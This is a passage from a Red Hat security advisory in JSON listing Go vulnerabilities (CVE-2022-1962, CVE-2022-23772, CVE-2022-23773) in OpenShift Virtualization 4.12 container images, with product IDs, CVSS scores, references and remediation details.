"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2022-1962" }, { "category": "external", "summary": "RHBZ#2107376", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107376" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2022-1962", "url": "https://www.cve.org/CVERecord?id=CVE-2022-1962" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-1962", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1962" }, { "category": "external", "summary": "https://go.dev/issue/53616", "url": "https://go.dev/issue/53616" }, { "category": "external", "summary": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", "url": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE" } ], "release_date": "2022-07-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2023-01-25T11:11:29+00:00", "details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2023:0408" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "golang: go/parser: stack exhaustion in all Parse* functions" }, { "cve": "CVE-2022-23772", "cwe": { "id": "CWE-190", "name": "Integer Overflow or Wraparound" }, "discovery_date": "2022-02-11T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2053532" } ], "notes": [ { "category": "description", "text": "A flaw was found in the big package of the math library in golang. The Rat.SetString could cause an overflow, and if left unhandled, it could lead to excessive memory use. This issue could allow a remote attacker to impact the availability of the system.", "title": "Vulnerability description" }, { "category": "summary", "text": "golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Enterprise Linux 8 and 9 are affected, because the code-base is affected by this vulnerability.\n\nRed Hat Product Security has rated this issue as having Moderate security impact, and the issue is not currently planned to be addressed in future updates for Red Hat Enterprise Linux 7, hence, marked as Out-of-Support-Scope. \n\nFor additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/ and Red Hat Enterprise Linux Life Cycle \u0026 Updates Policy: https://access.redhat.com/support/policy/updates/errata/.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64" ], "known_not_affected": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2022-23772" }, { "category": "external", "summary": "RHBZ#2053532", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2053532" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2022-23772", "url": "https://www.cve.org/CVERecord?id=CVE-2022-23772" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-23772", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23772" }, { "category": "external", "summary": "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", "url": "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ" } ], "release_date": "2022-01-19T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2023-01-25T11:11:29+00:00", "details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2023:0408" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString" }, { "cve": "CVE-2022-23773", "cwe": { "id": "CWE-1220", "name": "Insufficient Granularity of Access Control" }, "discovery_date": "2022-02-11T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", 